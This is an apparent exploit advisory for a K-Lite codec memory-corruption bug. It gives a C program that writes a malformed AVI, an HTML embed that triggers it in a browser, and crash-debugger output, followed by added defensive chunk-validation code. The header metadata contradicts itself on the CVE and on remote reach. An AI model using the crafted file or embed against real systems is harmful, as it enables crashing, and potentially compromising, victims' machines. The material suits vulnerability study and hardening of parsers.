K-lite codec Memory corruption vulnerability

2014.05.04
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: K-lite codec Memory corruption vulnerability
# Date: 2014/05/3
# Author: Aryan Bayaninejad
# Linkedin: https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: http://www.codecguide.com
# Software Link: http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328
# Version: 9.x and prior
# Tested on: Windows XP SP3 32-bit and 64-bit, Windows 7 32-bit and 64-bit
# CVE: CVE-2014-3151
# Found by: Piece Dumb Fuzzer

Details:

K-Lite Codec Pack version 9.x and prior are vulnerable to a memory corruption bug that allows remote attackers to execute arbitrary code on the victim's system via a malformed AVI file. The malformed file consists of a RIFF/AVI header, an INFO LIST whose sub-chunk declares a size of 0xFFFFFFFC, and 0x41 filler bytes. Tested with the latest Windows Media Player, Internet Explorer, GOM Player and KM Player on Windows XP and Windows 7, x64 and x86.

--------------------------------------------------------------------------------

PoC to trigger memory corruption:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* 154-byte malformed AVI: RIFF header, an INFO LIST whose sub-chunk claims
 * a size of 0xFFFFFFFC, then 0x41 filler that ends up in the crashing
 * registers (see the windbg output below). */
unsigned char sc[154] = {
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, 0x4C, 0x49, 0x53, 0x54,  /* "RIFF", size, "AVI ", "LIST" */
    0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF,  /* LIST size, "INFO", "--->", 0xFFFFFFFC */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  /* 0x41 filler from here on */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};

int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;

    /* CreateFileA is used explicitly so the narrow string path builds whether or not UNICODE is defined. */
    fileHandle = CreateFileA("d:\\poc.AVI", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if (fileHandle == INVALID_HANDLE_VALUE) {
        printf("(-) Failed to create file\n");
        return 1;
    }

    printf("(+) Writing file ...\n");
    WriteFile(fileHandle, sc, sizeof(sc), &dwBytesWritten, NULL);
    CloseHandle(fileHandle);
    return 0;
}

--------------------------------------------------------------------------------

PoC to remotely trigger memory corruption (the page embeds the generated file in the Windows Media Player browser plugin):

<embed type="application/x-mplayer2"
       pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
       name="mediaplayer1"
       ShowStatusBar="true"
       EnableContextMenu="false"
       autostart="false"
       height="330"
       width="360"
       loop="false"
       src="D:/PoC.avi" />

--------------------------------------------------------------------------------

windbg result (the access violation is raised after the K-Lite Haali AVI splitter, avi.dll, is loaded; eax and ecx hold 0x41414141 taken from the file's filler bytes, and the faulting instruction reads through ecx):

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000   C:\Program Files\Windows Media Player\wmplayer.exe
ModLoad: 7c900000 7c9b2000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 12950000 133b5000   C:\WINDOWS\system32\wmp.dll
ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 75a70000 75a91000   C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 59a60000 59b01000   C:\WINDOWS\system32\dbghelp.dll
ModLoad: 13740000 13f1b000   C:\WINDOWS\system32\wmploc.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 00ba0000 00e65000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 4ec50000 4edf6000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
ModLoad: 7e720000 7e7d0000   C:\WINDOWS\system32\SXS.DLL
ModLoad: 0d780000 0d7be000   C:\Program Files\Windows Media Player\mpvis.dll
ModLoad: 63000000 630e6000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01400000 01409000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 15110000 1536c000   C:\WINDOWS\system32\wmvcore.dll
ModLoad: 11c70000 11caa000   C:\WINDOWS\system32\WMASF.DLL
ModLoad: 76380000 76385000   C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 77690000 776b1000   C:\WINDOWS\system32\NTMARTA.DLL
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 0bef0000 0bf27000   C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 61da0000 61db0000   C:\WINDOWS\system32\mcicda.dll
ModLoad: 0e510000 0e562000   C:\WINDOWS\system32\mswmdm.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 5b860000 5b8b6000   C:\WINDOWS\system32\netapi32.dll
ModLoad: 0dfb0000 0dfe9000   C:\WINDOWS\system32\mspmsp.dll
ModLoad: 07940000 0797b000   C:\WINDOWS\system32\cewmdm.dll
ModLoad: 11d10000 11d1d000   C:\WINDOWS\system32\wmdmps.dll
ModLoad: 62bf0000 62c22000   C:\WINDOWS\system32\upnphost.dll
ModLoad: 4d4f0000 4d549000   C:\WINDOWS\system32\WINHTTP.dll
ModLoad: 74f00000 74f0c000   C:\WINDOWS\system32\SSDPAPI.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 13fe0000 14014000   C:\Program Files\Windows Media Player\wmpnssci.dll
ModLoad: 109c0000 109ec000   C:\WINDOWS\system32\PortableDeviceTypes.dll
ModLoad: 10930000 10979000   C:\WINDOWS\system32\PortableDeviceApi.dll
ModLoad: 0e020000 0e089000   C:\WINDOWS\system32\MSSCP.dll
ModLoad: 75cf0000 75d81000   C:\WINDOWS\system32\mlang.dll
ModLoad: 08b70000 08c65000   C:\WINDOWS\system32\drmv2clt.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 77c70000 77c94000   C:\WINDOWS\system32\msv1_0.dll
ModLoad: 722b0000 722b5000   C:\WINDOWS\system32\sensapi.dll
ModLoad: 14030000 14054000   C:\WINDOWS\system32\wmpps.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 10000000 10008000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
ModLoad: 5cb00000 5cb6e000   C:\WINDOWS\system32\shimgvw.dll
ModLoad: 38a70000 38a7c000   C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
ModLoad: 78130000 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 02f30000 02f9e000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000   C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]  ds:0023:41414141=????????
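The defensive side of this bug class is a chunk walker that refuses to trust a size field before checking it against the bytes that actually remain. The PoC's INFO LIST carries a sub-chunk whose size is 0xFFFFFFFC; a demuxer that computes "offset + 8 + size" in 32-bit arithmetic wraps around on that value and passes a naive bounds check, and the attacker-controlled filler then reaches a pointer, as the 0x41414141 in eax and ecx above shows. The example below is added here and is not code from the advisory, from K-Lite, Haali or LAV; it contrasts the wrapping check with a subtraction-based one and validates three constructed inputs: the first 32 bytes of the PoC reproduced from the advisory, a consistent minimal RIFF/AVI skeleton, and that skeleton with one inner size set to 0xFFFFFFFC. The status codes and function names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Status codes returned by the validating walker (names are this example's own). */
enum riff_status { RIFF_OK = 0, RIFF_TRUNCATED, RIFF_BAD_SIZE, RIFF_BAD_MAGIC };

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Unsafe form of the bounds check: the chunk size is added to the offset in
 * 32-bit arithmetic before comparing. With size = 0xFFFFFFFC the sum wraps,
 * the check passes, and the parser goes on to use the bogus size. */
int naive_chunk_fits(uint32_t off, uint32_t size, uint32_t len)
{
    return off + 8 + size <= len;
}

/* Safe form: compare the size against what remains; never add it to the offset first. */
int chunk_fits(size_t off, uint32_t size, size_t len)
{
    if (len < off || len - off < 8) return 0;           /* no room for fourcc + size */
    return size <= len - off - 8;
}

/* Walk the chunks in buf[0..len), descending into LIST chunks. Every size is
 * checked with chunk_fits() before it is trusted. */
static enum riff_status walk_chunks(const uint8_t *buf, size_t len, int depth, size_t *seen)
{
    size_t off = 0;
    while (off < len) {
        if (!chunk_fits(off, 0, len)) return RIFF_TRUNCATED;
        uint32_t size = rd_le32(buf + off + 4);
        if (!chunk_fits(off, size, len)) return RIFF_BAD_SIZE;
        (*seen)++;
        if (memcmp(buf + off, "LIST", 4) == 0) {
            if (size < 4 || depth > 16) return RIFF_BAD_SIZE;   /* list-type fourcc, nesting cap */
            enum riff_status st = walk_chunks(buf + off + 12, size - 4, depth + 1, seen);
            if (st != RIFF_OK) return st;
        }
        size_t advance = 8 + (size_t)size + (size & 1);       /* odd sizes carry one pad byte */
        if (advance > len - off) advance = len - off;         /* tolerate a missing final pad */
        off += advance;
    }
    return RIFF_OK;
}

enum riff_status riff_validate(const uint8_t *buf, size_t len, size_t *seen)
{
    *seen = 0;
    if (len < 12) return RIFF_TRUNCATED;
    if (memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "AVI ", 4) != 0) return RIFF_BAD_MAGIC;
    uint32_t riff_size = rd_le32(buf + 4);
    if (riff_size < 4) return RIFF_BAD_SIZE;
    /* The outer RIFF size is clamped, not rejected: truncated downloads are routine. */
    size_t body = riff_size - 4;
    if (body > len - 12) body = len - 12;
    return walk_chunks(buf + 12, body, 0, seen);
}

/* Single-call wrappers for checking a result. */
int riff_check(const uint8_t *buf, size_t len) { size_t n; return (int)riff_validate(buf, len, &n); }
size_t riff_chunk_count(const uint8_t *buf, size_t len) { size_t n; riff_validate(buf, len, &n); return n; }

/* Constructed sample 1: the first 32 bytes of the advisory's PoC plus a little of its 0x41 filler. */
const uint8_t POC_HEAD[] = {
    'R','I','F','F', 0x44,0x5E,0x0A,0x00, 'A','V','I',' ',
    'L','I','S','T', 0x7C,0xFC,0x00,0x00, 'I','N','F','O',
    '-','-','-','>', 0xFC,0xFF,0xFF,0xFF,
    0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41
};
/* Constructed sample 2: a consistent 48-byte RIFF/AVI skeleton (INFO list holding two chunks). */
const uint8_t GOOD_AVI[] = {
    'R','I','F','F', 40,0,0,0, 'A','V','I',' ',
    'L','I','S','T', 28,0,0,0, 'I','N','F','O',
    'I','S','F','T', 4,0,0,0,  'a','b','c','d',
    'J','U','N','K', 3,0,0,0,  'x','y','z',0
};
/* Constructed sample 3: the same skeleton, but the ISFT size is the PoC's 0xFFFFFFFC. */
const uint8_t INNER_OVERFLOW[] = {
    'R','I','F','F', 40,0,0,0, 'A','V','I',' ',
    'L','I','S','T', 28,0,0,0, 'I','N','F','O',
    'I','S','F','T', 0xFC,0xFF,0xFF,0xFF, 'a','b','c','d',
    'J','U','N','K', 3,0,0,0,  'x','y','z',0
};

int main(void)
{
    printf("good: %d  poc: %d  inner: %d\n",
           riff_check(GOOD_AVI, sizeof GOOD_AVI),
           riff_check(POC_HEAD, sizeof POC_HEAD),
           riff_check(INNER_OVERFLOW, sizeof INNER_OVERFLOW));
    /* The "--->" chunk header sits at offset 24 of the 154-byte PoC. */
    printf("naive check on the PoC chunk: %d, safe check: %d\n",
           naive_chunk_fits(24, 0xFFFFFFFCu, 154), chunk_fits(24, 0xFFFFFFFCu, 154));
    return 0;
}
```

The PoC header is rejected already at the LIST level, because its declared 0xFC7C-byte list cannot fit in the file; the third sample shows that even when the outer sizes are consistent, the inner 0xFFFFFFFC is caught before it can be used as a length or turned into a pointer. Clamping the outer RIFF size while rejecting inner sizes is a deliberate choice: the outer value is wrong in many legitimate, partially downloaded files, whereas an inner chunk that overruns its parent is never valid.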

